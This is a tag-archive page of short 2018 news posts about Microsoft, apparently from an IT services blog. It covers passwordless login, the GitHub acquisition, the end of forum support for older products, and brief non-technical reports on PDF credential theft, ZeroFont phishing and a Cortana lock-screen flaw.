Tag: Microsoft

Passwords May Be Dead Soon If Microsoft Gets Its Way 

Karanbir Singh (a program manager at Microsoft) is on a mission:

Kill the password.

As he said in a recent blog post:

“Nobody likes passwords.  They are inconvenient, insecure, and expensive.  In fact, we dislike them so much that we’ve been busy at work trying to create a world without them–a world without passwords.”

The company’s stated goal is to make it possible that an end user will never have to bother with passwords on a day to day basis and would instead provide credentials that are virtually impossible for hackers to crack or breach.

To accomplish this goal, the company is looking at a number of options, including biometrics and multi-factor authentication schemes.

Singh notes that this isn’t just blue-sky thinking, either.  Already, more than 47 million users and more than five thousand businesses are utilizing “Windows Hello for Business.”  Another solution currently in use is the Microsoft Authenticator app, which allows users to access their Microsoft accounts via their smartphones.

Additionally, as part of the Windows 10 update issued in April (2018), any user with a Managed Service Account or Azure Active Directory can now access their Windows 10 PC without having to enter their password, via the authenticator app and Windows Hello (provided that S-mode is enabled).

The company is also taking advantage of the newly ratified Fast Identity Online (FIDO2) security protocol, and is in the process of updating Windows Hello to enable secure authentication across a wider range of scenarios.  For example:  The company is currently working on a proof of concept for shared PCs that will allow users to log on via FIDO2 security keys, which will allow employees to carry their credentials with them.

They envision a scenario in which any user can simply walk up to any device the organization controls and authenticate without ever having to enter their username or password. This would be especially useful for analysts, help desk personnel, and anyone working in the medical profession.

Obviously no firm timeframes have been given, but as mentioned, some of these technologies are already in use and will be refined in the months ahead.

Microsoft Surpasses Google In Latest Valuation

<img class=”alignnone size-full wp-image-7941 alignleft” src=”https://www.securepc-wi.com/wp-content/uploads/2018/07/microsoft-stock-valuation-resized.jpg” alt=”” width=”300″ height=”225″ />Microsoft’s stock price is surging, putting the company’s total valuation at $753 billion. This makes it the third most valuable company on the planet, behind Amazon (782 billion), Apple ($923 billion) and leaving Google in fourth place, valued at $739 billion.

Google first overtook Microsoft in 2012, and since that time, the two companies have traded places repeatedly. So Microsoft’s current 3<sup>rd</sup> place position is expected to be relatively short-lived.

It’s worth noting, however, that since Satya Nadella took over for Steve Ballmer, Microsoft’s stock price has more than doubled, the company has moved decisively into some new areas, and has been dramatically refocused.

<strong>Some of those changes include:</strong>
<ul>
<li>A big emphasis on cloud-based technologies</li>
<li>A heavy emphasis on artificial intelligence</li>
<li>Big investments in quantum computing</li>
<li>Equally large investments in mixed-reality headsets</li>
<li>An emphasis on cross-platform technologies</li>
</ul>
Even more significantly, the company has veered away from two areas that had long been Microsoft staples.  The company has abandoned efforts to develop a Windows-based smartphone, and has moved away from the strategy of putting Windows at the center of everything Microsoft.

Although Google is likely to regain its #3 market cap position in the near future, Microsoft has some important strategic advantages over both Google and Apple that will serve it well in the long run.  The most significant of these is the fact that it has a much more diverse revenue stream.

Google gets some 90 percent of its income from advertising, and Apple gets some 60 percentof its income from the venerable iPhone. Microsoft, based on the most recent quarterly report, is generating 35 percent of its income from the Surface and its gaming division, another 30 percent from its cloud-based services, and a similar percentage from Office and the company’s various productivity tools.

Windows 10 Gets iTunes App For Apple Users

Apple promised that its iTunes app would be available on the Microsoft Store by the end of 2017.  The announcement was greeted with enthusiasm, but unfortunately, the company didn’t meet their own deadline. They cited the need for more time to build a more robust user experience for Windows users.

The wait is finally over, and its big news, because some Windows 10 machines can only download apps, and prior to this, iTunes was offered as a standalone download only.

The app is fairly sizeable, weighing in at 476.7MB, and is compatible with both x86 and x64 PCs.

A recent Microsoft blog post had this to say about the announcement:

“Now you can download iTunes from Microsoft Store and easily play your favorite music, movies and more – right from your Windows 10 PC.  iTunes is also home to Apple Music, where you can listen ad-free to over 45 million songs and download your favorites to enjoy without using WiFi.  iTunes is free to download, and you can try Apple Music free for three months.  There’s no commitment, and you can cancel anytime.”

One thing to be aware of is that if you already have an older version of iTunes installed on your machine and you download this app, it will automatically replace your older version.  It is recommended, therefore, that you back up your data before downloading the latest.  While it does offer a better user experience, it’s not worth the loss of your existing library of files.

Kudos to both Apple and Microsoft here. Apple for bringing an excellent free app to the Microsoft Store, and Microsoft for continuing to play nice with their longtime rival, and allowing their massive user base the pleasure of enjoying a portion of Apple’s wonderfully robust ecosystem.

Microsoft Purchases GitHub – What Does This Mean For Open Source?

Microsoft just made a big, significant purchase that has raised more than a few eyebrows.  They just acquired GitHub for a hefty $7.5 billion.

What makes the purchase interesting and potentially troublesome is that Microsoft is the world’s largest proprietary software company, and GitHub is the world’s largest open source hosting service.

The natural question on everyone’s mind then, is what does this mean for open source?  Is it doomed?  Is it soon to go the way of the dinosaur, or will Microsoft hold the reins of power loosely and let open source continue to flourish?

Those are fair questions, especially given that GitHub is used by more than 28 million developers around the world, and is home to more than 85 million code repositories.  In addition to that, the company was built on Git, which is an open source version control software written by Linus Torvalds (the creator of Linux). Its founders have worked hard to develop innovative workflows that have made the hub easy to use and work with.

The fear is that Microsoft will start strangling those developments and insist that GitHub begin using proprietary Microsoft products.  While it’s too early to say for certain, the early indications are encouraging.  Microsoft has stated that GitHub will be allowed to retain its status as an “open platform” and its service will continue to be offered for free.

Having said that, there will be some changes, including the fact that Microsoft will be offering integration between its AppCenter mobile testing service and projects hosted on GitHub.  This builds on previous collaborations between Microsoft and GitHub.  Last year, GitHub announced that they would support Microsoft’s “Git Virtual File System,” which the company designed for enterprise-sized data repositories.

The skeptics are right to be skeptical, but so far, the early indications are positive.  Note that it’s not a done deal just yet.  The merger is subject to regulatory approval in both the US and the EU.

Microsoft Ending Forum Support For Older Operating Systems

Big changes are coming from Microsoft starting in July (exact date unknown), and it has potentially dire implications if you’re using some of the company’s older technology.

Microsoft announced that in July, they’ll no longer provide forum-based support for a wide range of products and software, including:

  • Microsoft Band
  • Zune
  • Surface Pro
  • Surface Pro 2
  • Surface RT
  • Surface 2
  • Microsoft Security Essentials
  • Internet Explorer 10
  • Office 2010
  • Office 2013
  • Windows 7
  • Windows 8.1
  • Windows 8.1 RT

Although the company didn’t cite a specific reason for the change, it seems obvious that this is another move to push people into buying the latest and greatest of the company’s offerings.  Unfortunately for them, the announcement has been met with more than a little hostility, and for good reason.

Consider that the company has pledged to continue to support Windows 7 until 2020, and Windows 8.1 (and variants) until 2023.  Given that we’re still quite some distance from those EOL dates, closing an important avenue of support for a product the company is still ostensibly supporting seems a bit premature.  Nonetheless, there’s no indication at this time that the company has plans to extend the forum support for any of these products beyond July.

In some instances, this won’t prove to be problematic.  Few people still use Internet Explorer 10 as anything more than a curiosity, and Zune was never especially popular, so the loss of those forums isn’t likely to cause much backlash. However,  in the case of Windows 7 and 8.1, not only has the company pledged support for years to come, but those products are still actively used by a significant minority around the world, and those users aren’t thrilled with the recent announcement.

In any case, given that the company is unlikely to change course, this is all the more reason to make upgrading a priority if you’re still using any of the products mentioned above.

Hackers Can Use PDF Files To Access Windows Credentials

Security researcher Assaf Baharav from Check Point Security has discovered a new twist on an old, fairly well-known attack.  He was able to essentially “weaponize” PDFs to steal Windows credentials stored in NTLM hashes.  Unfortunately, no action other than simply opening the PDF is required for the hacker to gain access to the information.

Baharav used the same methodology that hackers have used in the past, which amounts to instantiating SMB requests from inside the document.  Hackers have already performed these types of attacks from inside web browsers, Windows shortcut files, shared folders, Microsoft Office documents, and Microsoft outlook. Using a PDF to run the exploit is something new.

Baharav had this to say about his research:

“We chose to test these two high profile readers (Adobe Acrobat and the FoxIT reader).  Regarding the others, we highly suspect they may be vulnerable as well.  We followed a 90 days disclosure policy by notifying only Adobe and Foxit regarding the issues.”

Foxit did not respond to the information Baharav sent, but Adobe did.  Unfortunately, their response was not encouraging.  They simply announced that they had no plans to address the issue, deferring to Windows OS-level mitigations (reference Microsoft Security Advisory ADV170014).

Microsoft released this advisory to provide instructions on how to disable the NTLM SSO authentication inside the Windows operating system.  This is a workable solution, but it has problems.

For starters, it’s not really a patch, but rather the modification of a specific registry key and then the implementation of a network isolation policy.  Worse, it’s only applicable to Windows 10 and Windows Server 2016 machines.  People who have older systems are simply left vulnerable.

Be on the alert then PDFs can now be used to steal credentials.  It appears that every reader is affected and that no help is coming for older systems.

New Trick Lets Hackers Bypass Office 365 Email Security

What’s old is new again.

Hackers have recently begun re-deploying a decade-old trick called ‘ZeroFont’ to get around Microsoft’s security filters and deliver phishing and spam emails to Office 365 email accounts.  The gimmick?  Zero-point fonts.

As anyone with even passing familiarity to Office 365 knows, if you’re drafting a document, you can change the font size to suit your tastes and preferences.  What few people realize is that you can use html code to set your font to zero-point size.

Of course, such a move has no practical application in everyday usage, because no one could read a zero-point font.  Hackers, however, can make cunning use of it, and Office 365 is unable to detect the presence of zero-point fonts.  Since they’re not detected, they’re not marked as malicious and sail right through the security filters.

By itself, the zero-point trick is useful, but not inherently deadly.  Unfortunately, it can be combined with other tricks like Punycode, Unicode, or Hexidecimal code to insert malicious commands into what appears to be a totally innocent email.

It gets better (or worse, depending on your point of view).  Just last month, researchers at a company called Avanan discovered that it was possible to use the HTML tag in an email or Office 365 document, point it at a malicious site, and the security filters would blithely ignore it.

Again, it should be noted that these tricks aren’t new.  They’ve been around for years, fell out of favor in preference for newer techniques, and now are being recycled.  Apparently, they’re so old that they skate right past modern security flags and filters.

Expect updates soon to catch these types of things, but in the short run, just be aware these types of attacks are not only possible, but trivial to execute.

Turn Cortana Off At Lock Screen To Avoid Potential Hack

Do you use Cortana?  It’s a handy virtual assistant (like Siri) built into Windows 10.  Unfortunately, as useful as she is, there’s a problem. Even if you don’t use Cortana yourself, take heed:  Microsoft has recently issued a security update based on findings by McAfee researchers.

It turns out that Cortana can be “summoned” from the lock screen of your PC and used to execute attacks by tricking the ever-helpful Cortana into indexing files from a USB drive, then executing them.

To accomplish the attack, the hacker would need physical access to the PC. Once they had that, they could easily execute Powershell scripts to reset your Windows 10 password, which would then give them unfettered access.

The vulnerability takes advantage of two things:  First, Cortana “listens” for commands, even while the PC is locked. Then, the OS indexes files constantly so that they’re ready to use at a moment’s notice.  Put those two elements together and you have the makings of a disaster.

Microsoft has rushed a patch out the door to address the issue. For now, the company is advising users to simply disable Cortana on the lock screen, so that your PC has to be unlocked in order for her to be active.  It’s probably good advice, given that not all companies update their OS as soon as patches are available, and this one is important.

To be safe, even if you don’t use Cortana, go into settings and disable the virtual assistant on the lock screen.  Then, when you’re away from your PC, at least that’s one less thing you have to worry about.

Unfortunately, this isn’t the first Cortana-related security issue we’ve seen, and it’s not likely to be the last.  As useful as the feature is, it does open the door to a number of other (potential) problems.  Stay vigilant.

Watch Out For Rise In Microsoft Office Attacks 

Menlo Security has recently published a new report that will probably dismay you if you’re a business owner.

Microsoft Office has been named as the attack vector of choice for hackers around the world. The most common form of the attack is a malicious Word document or other office document attached to an innocent looking email.

There are, of course, plenty of other ways to take advantage of various security weaknesses in MS Office and Office 365.  These include the use of remotely hosted malicious components embedded within documents that deliver zero-day exploits when the document is opened.

The reason MS Office is such a wildly popular choice isn’t because it has an unusual number of security loopholes that can be exploited (although it’s certainly got its share).  Rather, it has everything to do with the overwhelming popularity of the office suite.  Simply put, lots of people use it on a regular basis, and that means the pool of potential victims is enormous.

As the report explains:

“There is likely to be an increase in attacks via malevolent email attachments using stealthily embedded, remotely hosted malicious components that leverage applications and operating system vulnerabilities, both old and new.

With CVE-2018-8174 and CVE-2018-5002, the attackers leveraged Word as a vector to exploit Adobe Flash Player and Internet Explorer.  By using Word as the vector, the attackers were able to exploit a browser, even if it is not the default browser, and exploit Flash, even though Flash is blocked by most enterprises…Microsoft is therefore undoubtedly going to become the platform that attackers leverage most to deliver their zero-day exploits.”

All true, and beyond troubling.  If your business uses Microsoft Office or Office 365 (and odds are excellent that it does), continued vigilance is the key.